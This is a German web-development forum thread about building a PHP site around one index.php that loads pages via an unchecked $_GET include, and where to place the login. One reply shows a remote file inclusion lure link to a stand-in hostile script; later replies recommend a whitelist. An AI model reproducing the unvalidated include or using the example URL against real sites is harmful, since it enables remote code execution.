nicht angemeldet
PHP Login in index.php
1 0 0 
Julius
0 0 
Der Martin
0
PHP Login in index.php
Hallo,
Ich möchte die ganze seite nur auf einem Seiten Rahmen container PHP z.b. index.php erstellen und darüber alle weiteren HTML-Elemente laden. Ich möchte das auch mit einem Login machen in diesem Content der index.php.
<a href="index.php?page=irgendwas">irgendwas</a>
<a href="index.php?page=login">login</a>
$p = $_GET["page"];
$page = $p . ".php";
include( $page );
Ist es sinnvoll die Login funktion in ein zweite Container PHP zu packen z.b. login.php und registration.php oder würdet ihr mir davon abraten?
Herzlichste Grüße MB
-
Moin!
$p = $_GET["page"]; $page = $p . ".php"; include( $page );Das ist ja noch besser als Wordpress und Joomla mit allen verfügbaren "Plugins" zusammen auf einem Sever... Ich leg dann einen Link:
<p> <a href='http://example.com/index.php?page=http://foo.srv/boeses.script'>Brigitte Bardot nackt! </p>Du Includierst:/boeser-server.tm
http://foo.srv/boeses.script.php
Willst Du das wirklich?
Jörg Reinholz
-
Hallo Jörg, Lieber Jörg,
Ich denke ich stehe ganz gehörig auf dem schlauch.
Das ist ja noch besser als Wordpress und Joomla mit allen verfügbaren "Plugins" zusammen auf einem Sever... Ich leg dann einen Link:
verstehe ich nicht, sry.
Du Includierst:/boeser-server.tm
Warum solle ich das machen?
Willst Du das wirklich?
Und was will ich wirklich nicht? Bitte werd konkreter was du meinst. Ich verstehe deine Ausführungen nicht.
Gruß MB
-
Hallo MB,
Jörg meint, dass ein Angreifer über deine index.php (fast) beliebige Dateien von deinem Server inkludieren könnte, wenn du die Eingabe unzureichend (in deinem Code gar nicht) überprüfst.
Weitere Informationen: Sicherheit für Websites
Gruß
Julius-
Hi,
Jörg meint, dass ein Angreifer über deine index.php (fast) beliebige Dateien von deinem Server inkludieren könnte, ...
und je nachdem, wie PHP konfiguriert ist, nicht nur von deinem eigenen, sondern auch von beliebigen anderen Quellen im Internet. Genau das zeigt Jörgs Beispiel eindrucksvoll.
Ciao,
Martin-
Jörg meint, dass ein Angreifer über deine index.php (fast) beliebige Dateien von deinem Server inkludieren könnte, ...
und je nachdem, wie PHP konfiguriert ist, nicht nur von deinem eigenen, sondern auch von beliebigen anderen Quellen im Internet. Genau das zeigt Jörgs Beispiel eindrucksvoll.
Ah... jetzt verstehe ich was Jörg meint. Ich Werd die ein wenig konreter machen.
-
-
-
-
Hallo Jöhrg,
Natürlich will ich die zuladenden Seitenfragemente abfragen, ob sie in der erlaubten liste von seiten fragmenten stehen oder nicht. also wenn ein modifizierter Link ausgeführtwird, wird er von php routine pfad und datei überprüft, verglichen und abgewiesen. Sorry wenn ich das nicht deutlich war.
Ich woll nur wissen ob es sinnvoll und konform ist dieses Login im index.php zu includieren oder nicht.
Lieben Gruß MB
-
Hallo,
Natürlich will ich die zuladenden Seitenfragemente abfragen, ob sie in der erlaubten liste von seiten fragmenten stehen oder nicht.
okay, genau so sollte man dann vorgehen: Eine Whitelist mit den erlaubten Werten, und alles andere entweder auf eine Standardseite abbilden, oder eventuell mit einem 404 (Not Found) beantworten.
Sorry wenn ich das nicht deutlich war.
Naja, es war nicht bloß "nicht deutlich", es war mit keinem Wort erwähnt, dass du überhaupt irgendeine Überprüfung vorgesehen hast. :-)
Ich woll nur wissen ob es sinnvoll und konform ist dieses Login im index.php zu includieren oder nicht.
Wenn du sowieso das Grundgerüst nach diesem Schema aufbaust und alles über ein zentrales PHP-Script abhandelst, ist es IMO nicht sinnvoll, für bestimmte Seiten aus dem Schema auszubrechen.
Insofern: Ja, wenn schon, dann auch die Login-Seite auf diese Weise bauen.Noch eleganter wäre es allerdings, wenn das Login-Formular bereits im Rahmen-Script index.php steckt. Dieses Script könnte prüfen, ob der Nutzer bereits eingeloggt ist, und das Login-Formular ausgeben, wenn nicht. Das hätte für den Besucher den Vorteil, dass er auf jede Unterseite direkt einsteigen und sich da auch gleich einloggen kann.
So long,
Martin-
Hallo Martin,
Naja, es war nicht bloß "nicht deutlich", es war mit keinem Wort erwähnt, dass du überhaupt irgendeine Überprüfung vorgesehen hast. :-)
alles geklärt ;-).
Noch eleganter wäre es allerdings, wenn das Login-Formular bereits im Rahmen-Script index.php steckt. Dieses Script könnte prüfen, ob der Nutzer bereits eingeloggt ist, und das Login-Formular ausgeben, wenn nicht. Das hätte für den Besucher den Vorteil, dass er auf jede Unterseite direkt einsteigen und sich da auch gleich einloggen kann.
Soweit wollte ich net gehen.
und vielen Danke.
Herzlichste Grüße MB
-
-
Moin!
Ich woll nur wissen ob es sinnvoll
kommt drauf an.
und konform
wozu konform?
ist dieses Login im index.php zu includieren oder nicht.
Geschmacksfrage. Mir schmeckst nicht weil ich sicherheitsrelevanten (das Login gehört dazu) Code lieber isoliert sehe. Gab's oft genug, dass irgendwelche Seiteneffekte (einen habe ich ja oben vorgeführt) die Sicherheit verletzten.
Jörg Reinholz
-
Alles Klar. Das wollte ich wissen. Danke Dir
Gruß MB
-
-
-